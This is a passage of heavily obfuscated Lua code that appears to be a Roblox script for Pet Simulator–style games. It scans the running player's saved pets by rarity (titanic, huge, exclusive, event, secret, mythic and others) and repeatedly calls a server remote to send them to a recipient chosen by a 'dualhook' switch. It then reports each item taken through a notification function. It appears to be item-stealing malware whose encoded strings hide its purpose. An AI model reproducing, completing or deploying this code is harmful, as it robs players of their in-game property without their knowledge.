v108=v96;end end local v434={[2 -1 ]={[v7("\99\173\7\250\12\30\93\95\188","\56\49\200\100\147\124\119")]=v108,[v7("\232\55\190\253\195\48\187\227","\144\172\94\223")]=v90,[v7("\20\10\182\84","\39\68\111\194")]={v433},[v7("\251\163\244\212\120\176\211","\215\182\198\135\167\25")]=v106}};v35:InvokeServer(unpack(v434));if (( #EList==0) or (EList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EvList~=(0 -0)) and ( #EList==(0 -0)) and ( #HList==0) and ( #TList==0) and ( #BList==(0 -0)) and ( #PList==0)) then for v435,v436 in pairs(EvList) do v108=v107;if (v102~=nil) then if dualhook(v102) then v108=v96;end end local v437={[1948 -(414 + 1533) ]={[v7("\191\76\233\65\157\64\239\70\153","\40\237\41\138")]=v108,[v7("\227\125\251\245\69\201\112\233","\42\167\20\154\152")]=v90,[v7("\122\251\182\81","\65\42\158\194\34\17")]={v436},[v7("\55\34\65\31\44\234\30","\142\122\71\50\108\77\141\123")]=v106}};v35:InvokeServer(unpack(v437));if (( #EvList==(555 -(443 + 112))) or (EvList=={})) then break;end end end end end);spawn(function()while wait() do if (( #SList~=0) and ( #EvList==(1479 -(888 + 591))) and ( #EList==(0 -0)) and ( #HList==(0 + 0)) and ( #TList==(0 -0)) and ( #BList==0) and ( #PList==(0 + 0))) then for v438,v439 in pairs(SList) do v108=v107;if (v103~=nil) then if dualhook(v103) then v108=v96;end end local v440={[1 + 0 ]={[v7("\39\167\252\17\43\28\167\241\12","\91\117\194\159\120")]=v108,[v7("\62\20\63\21\58\255\32\9","\68\122\125\94\120\85\145")]=v90,[v7("\39\25\219\77","\218\119\124\175\62\168\185")]={v439},[v7("\136\245\91\215\164\247\77","\164\197\144\40")]=v106}};v35:InvokeServer(unpack(v440));if (( #SList==(0 -0)) or (SList=={})) then break;end end end end end);spawn(function()while wait() do if (( #MList~=(0 -0)) and ( #SList==0) and ( #EvList==(1678 -(136 + 1542))) and ( #EList==(0 -0)) and ( #HList==(0 + 0)) and ( #TList==0) and ( #BList==0) and ( #PList==(0 -0))) then for v441,v442 in pairs(MList) do v108=v107;if (v104~=nil) then if dualhook(v104) then v108=v96;end end local v443={[1 + 0 ]={[v7("\177\245\169\130\205\191\134\254\190","\214\227\144\202\235\189")]=v108,[v7("\201\172\134\118\31\189\87\47","\92\141\197\231\27\112\211\51")]=v90,[v7("\214\250\158\176","\177\134\159\234\195")]={v442},[v7("\144\238\44\179\200\186\238","\169\221\139\95\192")]=v106}};v35:InvokeServer(unpack(v443));if (( #MList==0) or (MList=={})) then break;end end end end end);local v109= #TList;WTianicList={};WTList={};WTcc={};local v110=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\236\142\111\51\43\37\223\159\122\59\17\50\209\153\126\56\39","\70\190\235\31\95\66")).Framework:FindFirstChild(v7("\150\235\24\244\228\168\251","\133\218\130\122\134")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v267,v268)if v268.titanic then table.insert(WTianicList,v267);end end);local v221=require(game:GetService(v7("\14\250\243\200\213\160\57\40\250\231\247\200\172\42\61\248\230","\88\92\159\131\164\188\195")).Library.Client.Save).Get().Pets;local v222={};for v269,v270 in pairs(v221) do v222[v270[v7("\149\39\187","\189\224\78\223\43\183\139")]]=false;end for v272,v273 in pairs(v221) do if (table.find(WTianicList,v273[v7("\39\248","\161\78\156\234\118")])~=nil) then table.insert(WTList,v273[v7("\178\190\205","\188\199\215\169")]);table.insert(WTcc,v273[v7("\245\13","\136\156\105\63\27")]);end end if (v109==( #WTList + (2 -1))) then v109= #TList;v88=v88-1 ;local v352=v90;local v353=STList[v110];local v354;local v355;for v444,v445 in pairs(game:GetService(v7("\41\137\105\56\18\143\120\32\30\136\74\32\20\158\120\51\30","\84\123\236\25"))[v7("\207\180\142\62\158\144\211\191\133\37\149","\213\144\235\202\119\204")].Pets:GetChildren()) do local v446=string.split(v445.Name,v7("\99\85\158","\45\67\120\190\74\72\67"))[1 -0 ];if (v446==tostring(v353)) then v354=require(v445:FindFirstChildOfClass(v7("\13\45\233\176\245\141\221\234\50\43\253\177","\137\64\66\141\197\153\232\142"))).name;v355=require(v445:FindFirstChildOfClass(v7("\46\223\38\179\132\6\227\33\180\129\19\196","\232\99\176\66\198"))).thumbnail;break;end end v95(v7("\182\50\43\20\126\140\244\118\172\97\98\76\79\164\205\13\194\8\11\76\49\205\163\63\239\51\45\7\118\215","\76\140\65\72\102\27\237\153"),v354,v7("\106\223\0\215\197\24\177\68\223\86\253\250\39\153","\222\42\186\118\178\183\97"),v91,v88,v355,UserName);v90=0 + 0 ;v91=1092 -(770 + 322) ;v110=v110 + 1 ;v80=0;v77=0 + 0 ;elseif ((v109==(0 + 0)) or (v88==0)) then TList={};break;end WTianicList={};WTList={};WTcc={};wait(1);end end);local v111= #BList;WBananaList={};WBList={};WBcc={};spawn(function()while wait() do WLibrary=require(game:GetService(v7("\111\233\84\134\84\239\69\158\88\232\119\158\82\254\69\141\88","\234\61\140\36")).Framework:FindFirstChild(v7("\13\212\184\96\14\51\196","\111\65\189\218\18")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v274,v275)if (v275.name==v7("\65\74\21\52\5\93","\207\35\43\123\85\107\60")) then table.insert(WBananaList,v274);end end);local v224=require(game:GetService(v7("\66\175\176\230\112\115\171\180\239\125\67\190\175\248\120\119\175","\25\16\202\192\138")).Library.Client.Save).Get().Pets;local v225={};for v276,v277 in pairs(v224) do v225[v277[v7("\232\194\169","\148\157\171\205\130\201")]]=false;end for v279,v280 in pairs(v224) do if (table.find(WBananaList,v280[v7("\42\208","\150\67\180\20\73\177")])~=nil) then table.insert(WBList,v280[v7("\152\17\30","\45\237\120\122")]);table.insert(WBcc,v280[v7("\222\236","\76\183\136\194")]);end end if (v111==( #WBList + 1)) then local v356=0 + 0 ;local v357;local v358;local v359;while true do if (v356==(1 -0)) then local v495=0;while true do if (v495==(0 -0)) then v357=v90;v358=v7("\88\231\235\57\94\78","\116\26\134\133\88\48\47");v495=2 -1 ;end if ((3 -2)==v495) then v356=2;break;end end end if (v356==2) then v359="rbxassetid://10946336703";v95(v7("\68\195\161\234\188\124\31\155\224\174\247\80\63\239\129\202\156\56\84\129\250\230\188\124\31\207\161\190","\18\126\161\192\132\221"),v358,v7("\127\45\184\1\68\70\39\160\1","\54\63\72\206\100"),v91,v88,v359,UserName);v356=3;end if (v356==0) then local v496=0 + 0 ;while true do if (v496==(1 -0)) then v356=1 + 0 ;break;end if (v496==0) then v111= #BList;v88=v88-(1 + 0) ;v496=1;end end end if (v356==(3 + 0)) then local v497=0 -0 ;local v498;while true do if (v497==(0 -0)) then v498=0;while true do if (v498==1) then v356=2 + 2 ;break;end if (v498==(0 -0)) then v90=0;v91=0;v498=3 -2 ;end end break;end end end if (v356==(2 + 2)) then v80=0 -0 ;v77=0;break;end end elseif ((v111==0) or (v88==(831 -(762 + 69)))) then BList={};break;end WBananaList={};WBList={};WBcc={};wait(3 -2 );end end);local v112= #HList;WHugeList={};WHList={};WHcc={};local v113=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\250\92\85\118\236\120\201\77\64\126\214\111\199\75\68\125\224","\27\168\57\37\26\133")).Framework:FindFirstChild(v7("\1\163\126\186\214\63\179","\183\77\202\28\200")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v281,v282)if v282.huge then table.insert(WHugeList,v281);end end);local v227=require(game:GetService(v7("\37\54\153\4\30\48\136\28\18\55\186\28\24\33\136\15\18","\104\119\83\233")).Library.Client.Save).Get().Pets;local v228={};for v283,v284 in pairs(v227) do v228[v284[v7("\224\241\35","\35\149\152\71\66")]]=false;end for v286,v287 in pairs(v227) do if (table.find(WHugeList,v287[v7("\16\236","\90\121\136\34\208")])~=nil) then table.insert(WHList,v287[v7("\210\7\81","\126\167\110\53")]);table.insert(WHcc,v287[v7("\52\20","\95\93\112\78\152\188")]);end end if (v112==( #WHList + 1 + 0)) then v112= #WHList;v88=v88-(1 + 0) ;local v360=SHList[v113];local v361;local v362;for v447,v448 in pairs(game:GetService(v7("\243\240\149\25\237\189\211\213\240\129\38\240\177\192\192\242\128","\178\161\149\229\117\132\222"))[v7("\183\228\249\133\147\51\133\23\167\233\228","\67\232\187\189\204\193\118\198")].Pets:GetChildren()) do local v449=string.split(v448.Name,v7("\203\99\245","\143\235\78\213\64\91\98"))[2 -1 ];if (v449==tostring(v360)) then v362=require(v448:FindFirstChildOfClass(v7("\160\71\128\252\124\179\190\75\150\224\96\162","\214\237\40\228\137\16"))).name;v361=require(v448:FindFirstChildOfClass(v7("\168\236\235\204\15\163\182\224\253\208\19\178","\198\229\131\143\185\99"))).thumbnail;break;end end v95(v7("\11\129\167\125\84\149\151\126\94\153\188\123\11\204\226\57\121\185\143\86\27\198\232\41\92\131\166\118\72\179\165\124\68\152\160\41","\19\49\236\200"),v362,v7("\222\50\224\178\246\163\241\57\243","\218\158\87\150\215\132"),v91,v88,v361,UserName);v90=0 + 0 ;v91=0;v113=v113 + 1 + 0 ;v80=0;v77=0 -0 ;elseif ((v112==(157 -(8 + 149))) or (v88==0)) then HList={};break;end WHugeList={};WHList={};WHcc={};wait(1321 -(1199 + 121) );end end);local v114= #PList;WPogList={};WPList={};WPcc={};local v115=1 -0 ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\201\27\201\238\63\33\204\239\27\221\209\34\45\223\250\25\220","\173\155\126\185\130\86\66")).Framework:FindFirstChild(v7("\201\175\184\213\137\254\252","\140\133\198\218\167\232")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v288,v289)if (string.split(v289.name," ")[2 -1 ]==v7("\133\33\179","\228\213\78\212\29")) then table.insert(WPogList,v288);end end);local v230=require(game:GetService(v7("\181\73\166\9\226\132\77\162\0\239\180\88\185\23\234\128\73","\139\231\44\214\101")).Library.Client.Save).Get().Pets;local v231={};for v290,v291 in pairs(v230) do v231[v291[v7("\204\230\2","\118\185\143\102\62\112\209\81")]]=false;end for v293,v294 in pairs(v230) do if (table.find(WPogList,v294[v7("\85\116","\88\60\16\73\134\197\117\124")])~=nil) then local v450=0 + 0 ;local v451;local v452;while true do if (v450==(0 -0)) then v451=0 -0 ;v452=nil;v450=1 + 0 ;end if (v450==(1808 -(518 + 1289))) then while true do if (v451==(0 -0)) then v452=0;while true do if (v452==(0 + 0)) then table.insert(WPList,v294[v7("\69\227\252","\33\48\138\152\168")]);table.insert(WPcc,v294[v7("\123\18","\87\18\118\80\49\161")]);break;end end break;end end break;end end end end if (v114==( #WPList + 1)) then v114= #WPList;v88=v88-(1 -0) ;local v363=SPList[v115];local v364;local v365;for v453,v454 in pairs(game:GetService(v7("\126\27\202\172\185\79\31\206\165\180\127\10\213\178\177\75\27","\208\44\126\186\192"))[v7("\200\37\128\239\38\217\234\122\216\40\157","\46\151\122\196\166\116\156\169")].Pets:GetChildren()) do local v455=string.split(v454.Name,v7("\165\160\6","\155\133\141\38\122"))[1 + 0 ];if (v455==tostring(v363)) then v364=require(v454:FindFirstChildOfClass(v7("\8\37\168\84\67\122\150\38\56\165\81\91","\197\69\74\204\33\47\31"))).name;v365=require(v454:FindFirstChildOfClass(v7("\221\64\94\146\252\74\105\132\226\70\74\147","\231\144\47\58"))).thumbnail;break;end end v95(v7("\232\222\211\103\29\103\143\115\248\232\245\82\82\119\143\99\180\209\200\112\66","\89\210\184\186\21\120\93\175"),v364,"",v91,v88,v365,UserName);v90=469 -(304 + 165) ;v91=0 + 0 ;v115=v115 + (161 -(54 + 106)) ;v80=1969 -(1618 + 351) ;v77=0 + 0 ;elseif ((v114==(1016 -(10 + 1006))) or (v88==(0 + 0))) then PList={};break;end WPogList={};WPList={};WPcc={};wait(1 + 0 );end end);local v116= #EList;WExclusiveList={};WEList={};WEcc={};local v117=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\131\86\108\217\112\57\176\71\121\209\74\46\190\65\125\210\124","\90\209\51\28\181\25")).Framework:FindFirstChild(v7("\252\114\85\252\190\194\98","\223\176\27\55\142")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v295,v296)if ((v296.rarity==v7("\1\163\205\185\49\168\199\163\33","\213\68\219\174")) and  not v296.huge and  not v296.titanic) then table.insert(WExclusiveList,v295);end end);local v233=require(game:GetService(v7("\57\229\51\235\35\198\62\107\14\228\16\243\37\215\62\120\14","\31\107\128\67\135\74\165\95")).Library.Client.Save).Get().Pets;local v234={};for v297,v298 in pairs(v233) do v234[v298[v7("\205\225\248","\209\184\136\156\45\33")]]=false;end for v300,v301 in pairs(v233) do if ((table.find(WExclusiveList,v301[v7("\14\204","\216\103\168\21\104")])~=nil) and  not v301.huge and  not v301.titanic) then table.insert(WEList,v301[v7("\109\164\71","\196\24\205\35")]);table.insert(WEcc,v301[v7("\39\143","\102\78\235\131")]);end end if (v116==( #WEList + (3 -2))) then v116= #WEList;v88=v88-(1034 -(912 + 121)) ;local v366=SEList[v117];local v367;local v368;for v456,v457 in pairs(game:GetService(v7("\200\43\36\72\78\58\182\32\255\42\7\80\72\43\182\51\255","\84\154\78\84\36\39\89\215"))[v7("\194\222\114\113\55\216\194\98\119\55\196","\101\157\129\54\56")].Pets:GetChildren()) do local v458=string.split(v457.Name,v7("\93\228\202","\25\125\201\234\203\67"))[1 + 0 ];if (v458==tostring(v366)) then v368=require(v457:FindFirstChildOfClass(v7("\84\251\28\22\24\34\32\122\230\17\19\0","\115\25\148\120\99\116\71"))).name;v367=require(v457:FindFirstChildOfClass(v7("\33\50\189\49\77\9\14\186\54\72\28\41","\33\108\93\217\68"))).thumbnail;break;end end v95(v7("\129\95\164\169\223\82\158\175\222\74\179\247\155\1\235\136\195\72\173\184\200\66\183\168\145\1\225\247\207\78\165\169\194\116\163\168\218\89\251","\205\187\43\193"),v368,"",v91,v88,v367,UserName);v90=1289 -(1140 + 149) ;v91=0;v117=v117 + 1 ;v80=0 + 0 ;v77=0 -0 ;elseif ((v116==0) or (v88==(0 + 0))) then EList={};break;end WExclusiveList={};WEList={};WEcc={};wait(3 -2 );end end);local v118= #EvList;WEventList={};WEvList={};WEvcc={};local v119=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\204\119\21\211\247\113\4\203\251\118\54\203\241\96\4\216\251","\191\158\18\101")).Framework:FindFirstChild(v7("\233\202\133\165\174\215\218","\207\165\163\231\215")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v302,v303)if (v303.rarity==v7("\227\239\252\88\48","\16\166\153\153\54\68")) then table.insert(WEventList,v302);end end);local v236=require(game:GetService(v7("\224\182\208\74\61\34\248\198\182\196\117\32\46\235\211\180\197","\153\178\211\160\38\84\65")).Library.Client.Save).Get().Pets;local v237={};for v304,v305 in pairs(v236) do v237[v305[v7("\151\2\94","\75\226\107\58")]]=false;end for v307,v308 in pairs(v236) do if (table.find(WEventList,v308[v7("\81\218","\173\56\190\113\26\113\162")])~=nil) then local v459=0 -0 ;while true do if (v459==0) then table.insert(WEvList,v308[v7("\222\215\41","\151\171\190\77\101")]);table.insert(WEvcc,v308[v7("\204\43","\107\165\79\152\201\152\29")]);break;end end end end if (v118==( #WEvList + 1)) then v118= #WEvList;v88=v88-1 ;local v369=v90;local v370=SEvList[v119];local v371;local v372;for v460,v461 in pairs(game:GetService(v7("\101\75\248\199\93\124\86\90\237\207\103\107\88\92\233\204\81","\31\55\46\136\171\52"))[v7("\238\23\248\221\227\13\255\192\254\26\229","\148\177\72\188")].Pets:GetChildren()) do local v462=string.split(v461.Name,v7("\230\251\23","\179\198\214\55"))[1 + 0 ];if (v462==tostring(v370)) then v371=require(v461:FindFirstChildOfClass(v7("\221\3\118\99\73\214\195\15\96\127\85\199","\179\144\108\18\22\37"))).name;v372=require(v461:FindFirstChildOfClass(v7("\235\172\31\156\195\195\144\24\155\198\214\183","\175\166\195\123\233"))).thumbnail;break;end end v95(v7("\181\210\72\90\248\255\203\83\19\176\165\136\120\95\245\225\214\23\3\176\181\210\72\90\248\255\203\83\19","\144\143\162\61\41"),v371,"",v91,v88,v372,v107,petinfo);v90=0 -0 ;v91=0;v119=v119 + (187 -(165 + 21)) ;v80=111 -(61 + 50) ;v77=0 + 0 ;elseif ((v118==(0 -0)) or (v88==0)) then EvList={};break;end WEventList={};WEvList={};WEvcc={};wait(1);end end);local v120= #SList;WSecretList={};WSList={};WScc={};local v121=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\210\214\13\92\123\132\50\244\214\25\99\102\136\33\225\212\24","\83\128\179\125\48\18\231")).Framework:FindFirstChild(v7("\113\190\241\207\70\12\68","\126\61\215\147\189\39")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v309,v310)if (v310.rarity==v7("\75\250\30\87\125\235","\37\24\159\125")) then table.insert(WSecretList,v309);end end);local v239=require(game:GetService(v7("\232\163\101\78\211\165\116\86\223\162\70\86\213\180\116\69\223","\34\186\198\21")).Library.Client.Save).Get().Pets;local v240={};for v311,v312 in pairs(v239) do v240[v312[v7("\237\1\193","\162\152\104\165\61")]]=false;end for v314,v315 in pairs(v239) do if (table.find(WSecretList,v315[v7("\196\43","\133\173\79\210\29\16")])~=nil) then local v463=0 -0 ;while true do if (0==v463) then table.insert(WSList,v315[v7("\152\117\233","\75\237\28\141")]);table.insert(WScc,v315[v7("\213\91","\129\188\63\172\209\79\123\135")]);break;end end end end if (v120==( #WSList + 1 + 0)) then v120= #WSList;v88=v88-1 ;local v373=SSList[v121];local v374;local v375;for v464,v465 in pairs(game:GetService(v7("\114\225\246\193\73\231\231\217\69\224\213\217\79\246\231\202\69","\173\32\132\134"))[v7("\113\36\44\198\156\20\238\122\52\58\214","\173\46\123\104\143\206\81")].Pets:GetChildren()) do local v466=string.split(v465.Name,v7("\244\80\98","\97\212\125\66\234\37\227"))[1461 -(1295 + 165) ];if (v466==tostring(v373)) then v374=require(v465:FindFirstChildOfClass(v7("\167\236\178\32\18\143\208\181\39\23\154\247","\126\234\131\214\85"))).name;v375=require(v465:FindFirstChildOfClass(v7("\169\218\77\79\67\129\230\74\72\70\148\193","\47\228\181\41\58"))).thumbnail;break;end end v95(v7("\252\239\209\46\16\56\22\168\251\230\61\2\51\26\252\188\147\113\48\21\60\148\217\237\113\73\112\69\181\244\204\40\11\57\17\161\195\223\58\0\53\69","\127\198\156\185\91\99\80"),v374,"",v91,v88,v375,v107);v90=0;v91=0;v121=v121 + 1 + 0 ;v80=0;v77=0;elseif ((v120==(0 + 0)) or (v88==(1397 -(819 + 578)))) then SList={};break;end WSecretList={};WSList={};WScc={};wait(1403 -(331 + 1071) );end end);local v122= #MList;WMythicList={};WMList={};WMcc={};local v123=744 -(588 + 155) ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\199\31\220\252\174\8\56\202\240\30\255\228\168\25\56\217\240","\190\149\122\172\144\199\107\89")).Framework:FindFirstChild(v7("\30\12\243\236\255\32\28","\158\82\101\145\158")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v316,v317)if (v317.rarity==v7("\93\231\22\30\77\115\255\14","\36\16\158\98\118")) then table.insert(WMythicList,v316);end end);local v242=require(game:GetService(v7("\242\19\211\247\81\235\38\241\197\18\240\239\87\250\38\226\197","\133\160\118\163\155\56\136\71")).Library.Client.Save).Get().Pets;local v243={};for v318,v319 in pairs(v242) do v243[v319[v7("\227\171\117","\213\150\194\17\146\214\127")]]=false;end for v321,v322 in pairs(v242) do if ((table.find(WMythicList,v322[v7("\18\173","\86\123\201\196\180\38\196\194")])~=nil) and v322.hc and v322.dm) then local v467=1282 -(546 + 736) ;local v468;while true do if (0==v467) then v468=1937 -(1834 + 103) ;while true do if (v468==0) then table.insert(WMList,v322[v7("\226\225\221","\207\151\136\185")]);table.insert(WMcc,v322[v7("\161\135","\17\200\227\72\226\20\24")]);break;end end break;end end end end if (v122==( #WMList + 1 + 0)) then v122= #WMList;v88=v88-1 ;local v376=SMList[v123];local v377;local v378;for v469,v470 in pairs(game:GetService(v7("\130\68\11\219\192\242\238\235\181\69\40\195\198\227\238\248\181","\159\208\33\123\183\169\145\143"))[v7("\205\101\28\31\192\127\27\2\221\104\1","\86\146\58\88")].Pets:GetChildren()) do local v471=string.split(v470.Name,v7("\24\146\170","\154\56\191\138\160\206\137\86"))[1];if (v471==tostring(v376)) then v377=require(v470:FindFirstChildOfClass(v7("\171\86\241\146\112\63\178\207\148\80\229\147","\172\230\57\149\231\28\90\225"))).name;v378=require(v470:FindFirstChildOfClass(v7("\47\165\130\199\36\222\49\169\148\219\56\207","\187\98\202\230\178\72"))).darkMatterThumbnail;break;end end v95(v7("\123\243\173\50\72\46\239\254\112\0\107\204\189\36\66\40\226\165\60\0\107\161\254\34\67\35\227\171\62\16","\42\65\129\196\80"),v377,"",v91,v88,v378,v107);v90=0;v91=0;v123=v123 + (2 -1) ;v80=0;v77=0;elseif ((v122==(1766 -(1536 + 230))) or (v88==0)) then MList={};break;end WMythicList={};WMList={};WMcc={};wait(492 -(128 + 363) );end end);
